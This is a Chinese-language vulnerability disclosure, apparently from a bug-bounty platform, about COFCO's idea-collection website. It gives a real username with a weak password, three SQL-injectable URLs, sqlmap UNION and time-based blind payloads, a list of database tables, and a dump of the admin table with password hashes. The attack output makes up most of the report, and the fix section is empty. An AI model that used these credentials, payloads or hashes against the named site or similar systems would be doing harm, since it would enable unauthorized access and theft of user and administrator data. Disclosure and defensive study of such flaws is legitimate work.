漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

RT

详细说明:

网址:http://idea.cofco.com/,中粮创意收集管理系统,用户名lxia和弱密码123456可进行登陆。
网址:http://idea.cofco.com/?m=News&a=newsdetails&news_id=118、
http://idea.cofco.com/?m=News&a=activity&news_id=108、http://idea.cofco.com/index.php/Idea_plat/idea_details/id/92484/inde,前两个news_id存在注入,后一个存在伪静态注入。

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: news_id=-1831) UNION ALL SELECT NULL,NULL,CONCAT(0x3a67616a3a,0x4142504374584f66705a,0x3a776d693a),NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: news_id=105) AND SLEEP(5) AND (6137=6137
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL >= 5.0.0
Database: chinafood
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cofco_userinfo | 6410 |
| cofco_userlog | 3050 |
| cofco_department | 2125 |
| cofco_credit | 1607 |
| cofco_creative_log | 335 |
| cofco_message | 321 |
| cofco_creative | 177 |
| cofco_praise | 172 |
| cofco_vote | 154 |
| cofco_make_action | 137 |
| cofco_access | 85 |
| cofco_creative_status | 79 |
| cofco_collect | 75 |
| cofco_comment | 61 |
| cofco_node | 52 |
| cofco_feedback | 39 |
| cofco_creative_draft | 37 |
| cofco_admin_message | 22 |
| cofco_dangqiuserinfo | 14 |
| cofco_coverimglist | 11 |
| cofco_auditer | 9 |
| cofco_newscenter | 9 |
| cofco_role_user | 8 |
| cofco_write_userinfo | 8 |
| cofco_dangqi | 6 |
| cofco_intergal_bj | 6 |
| cofco_admin | 4 |
| cofco_lotteryinfo | 4 |
| cofco_role | 4 |
| cofco_goods | 3 |
| cofco_news_activity | 3 |
| cofco_orders | 3 |
| documents | 3 |
| cofco_lottery_user | 2 |
| cofco_news | 2 |
| cofco_version | 2 |
| cofco_andriodinfo | 1 |
| cofco_email_template | 1 |
| cofco_iosinfo | 1 |
| cofco_lottery_goods | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 767 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| PARTITIONS | 82 |
| TABLES | 82 |
| STATISTICS | 64 |
| KEY_COLUMN_USAGE | 50 |
| TABLE_CONSTRAINTS | 50 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 18 |
| TABLE_PRIVILEGES | 12 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 3 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: news_id=-1831) UNION ALL SELECT NULL,NULL,CONCAT(0x3a67616a3a,0x4142504374584f66705a,0x3a776d693a),NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: news_id=105) AND SLEEP(5) AND (6137=6137
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL >= 5.0.0
Database: chinafood
Table: cofco_admin
[4 entries]
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+
| aid | pwd | email | status | remark | `time` | nickname | find_code |
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+
| 1 | dd8d34ebd7ddaf48ccf14abbc0d5a4ba | [email protected] | 1 | 鎴戞槸瓒呯骇绠$悊鍛?鍝堝搱~~ | 1378706881 | 瓒呯骇绠$悊鍛? | <blank> |
| 16 | 7d1fa7fc2c5079a9758af35ecf1c4173 | [email protected] | 1 | 绠$悊鍛? | 1388223174 | 绠$悊鍛? | 2 |
| 23 | fdab0aeb573f2395c8fbd34306ccf94f | [email protected] | 1 | <blank> | 1390725529 | NULL | NULL |
| 22 | b6904ee5255db1bb7be5b760470b6914 | [email protected] | 1 | <blank> | 1390725476 | NULL | NULL |
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+


1.png

2.png

3.png

4.png

5.png

6.png

7.png

漏洞证明:

1.png

2.png

3.png

4.png

5.png

6.png

7.png

修复方案:

...

标签: none

评论已关闭